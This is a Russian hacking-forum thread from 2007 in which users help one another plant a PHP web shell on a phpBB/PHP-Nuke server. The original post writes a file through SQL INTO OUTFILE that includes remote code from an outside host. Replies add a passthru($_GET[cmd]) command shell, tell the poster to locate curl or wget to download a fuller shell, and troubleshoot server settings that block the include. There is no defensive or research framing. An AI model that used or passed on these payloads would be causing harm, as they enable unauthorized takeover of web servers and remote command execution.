ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Проблемы при заливке шелла
  #1  
Старый 04.07.2007, 20:54
Аватар для Azter
Azter
Познающий
Регистрация: 01.09.2005
Сообщений: 51
Провел на форуме:
208102

Репутация: 5
По умолчанию Проблемы при заливке шелла

Заливаю шелл через востановление базы в phpbb
Код:
SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
Код исполняется это факт, но когда захожу на
http://host/Forums/images/avatars/shell.php - выбрасывает пустую страницу =( "?" - в конце не помогает.
Из-за чего такое может быть?
 
Ответить с цитированием

  #2  
Старый 04.07.2007, 20:56
Аватар для Y.Dmitriy
Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441

Репутация: 161
Отправить сообщение для Y.Dmitriy с помощью ICQ Отправить сообщение для Y.Dmitriy с помощью AIM Отправить сообщение для Y.Dmitriy с помощью MSN
По умолчанию

в папке куда ты залил шел находится конфигурационный файл Апача...
с параметрами: "первый нах"(шутка, но только про имя параметра...)
 
Ответить с цитированием

  #3  
Старый 04.07.2007, 21:03
Аватар для maxster
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

прав не хватает, что бы через бд файл заливать
 
Ответить с цитированием

  #4  
Старый 04.07.2007, 21:23
Аватар для Azter
Azter
Познающий
Регистрация: 01.09.2005
Сообщений: 51
Провел на форуме:
208102

Репутация: 5
По умолчанию

Цитата:
Сообщение от maxster  
прав не хватает, что бы через бд файл заливать
не факт, обычно если не хватает прав, то вобще ничего не создается, и выбрасывает уведомления, а тут с этим все в порядке.
 
Ответить с цитированием

  #5  
Старый 04.07.2007, 21:31
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию

если открывается пшп файл, то это уже есть гуд. скорей всего инклуд извне запрещен, так что пробни вначале
Код:
SELECT '<? phpinfo() ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
если при заходе на сцылко shell.php покажет те пшпинфо, то можешь заливать такой код
Код:
<? passthru($_GET[cmd]); ?>
потом юзай shell.php?cmd=ls

зы. а далее ищи качалки и заливай норм шелл (which curl;which wget;which fetch;which lynx etc )
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #6  
Старый 04.07.2007, 21:32
Аватар для The_HuliGun
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию

Возможно просто отключена возможность подключения удаленных файлов через include().
Создай файл с кодом
PHP код:
<?
 phpinfo
();
?>
и посмотри на директуву allow_url_fopen, если она off, тогда через include() ничего не вийдет.
 
Ответить с цитированием

  #7  
Старый 04.07.2007, 21:38
Аватар для nightmare007
nightmare007
Новичок
Регистрация: 28.10.2006
Сообщений: 23
Провел на форуме:
125281

Репутация: 1
По умолчанию

попробуй

Код:
SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE '/bla/bla-bla/Forums/images/avatars/shell.php';
 
Ответить с цитированием

  #8  
Старый 04.07.2007, 21:57
Аватар для Azter
Azter
Познающий
Регистрация: 01.09.2005
Сообщений: 51
Провел на форуме:
208102

Репутация: 5
По умолчанию

Такс phpinfo - катит
allow_url_fopen - on.
Все, теперь просто cmd - сделаю, но интересно почему - инклуд шелла не прокатил =(
Хотя все ясно
allow_url_include - Off
Чем можно заменить include? кажется можно curl, но как?

Последний раз редактировалось Azter; 04.07.2007 в 22:00..
 
Ответить с цитированием

  #9  
Старый 04.07.2007, 22:07
Аватар для Azter
Azter
Познающий
Регистрация: 01.09.2005
Сообщений: 51
Провел на форуме:
208102

Репутация: 5
По умолчанию

Кстати
Код:
<? passthru($_GET[cmd]); ?>
не катит, при запросе любой команды тоже белая страница когда просто запустил shell.php то квакнуло Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\путь_к_шелу
 
Ответить с цитированием

  #10  
Старый 04.07.2007, 22:44
Аватар для The_HuliGun
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию

Может быть safe_mode = on, тогда не команды не выполняются.

Последний раз редактировалось The_HuliGun; 04.07.2007 в 22:53..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблемы с заливкой шелла в ipb anakreon Форумы 8 18.03.2007 15:20
Моделирование программно-аппаратных ''реактивных'' систем раскрашенными сетями Петри bxN5 Чужие Статьи 1 09.03.2007 15:50
Проблемы с заливкой шелла на phpbb AlexCRC Форумы 8 21.10.2006 17:37
UBB Threads 6.5.1 (Инструкция по заливке шелла) pch Форумы 0 30.04.2006 20:20
Проблемы с Аничатовскими штучками. temon Болталка 4 27.09.2005 12:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ